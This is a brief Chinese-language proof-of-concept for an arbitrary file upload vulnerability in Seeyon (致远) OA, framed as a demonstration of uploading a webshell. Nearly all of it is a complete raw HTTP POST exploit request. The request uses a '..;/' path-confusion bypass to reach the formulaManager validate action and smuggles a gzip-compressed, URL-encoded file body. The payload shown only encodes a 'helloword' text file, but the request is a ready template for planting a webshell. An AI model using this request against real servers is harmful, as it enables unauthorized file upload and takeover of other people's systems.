这是一个对webshell进行gzip压缩url编码后在上传的演示

致远OA的任意文件上传漏洞
_____________________________________________________________________________________________________________________
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXX;
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 117


managerMethod=validate&arguments=%1F%8B%08%00%F8%8D%3Ff%02%FF%CBH%CD%C9%C9%2F%CF%2F%CAI%01%00%AD+%EB%F9%0A%00%00%00
_____________________________________________________________________________________________________________________
上传的文件text.txt内容为helloword,进行gzip压缩url编码后最终变为一段poc中的数据
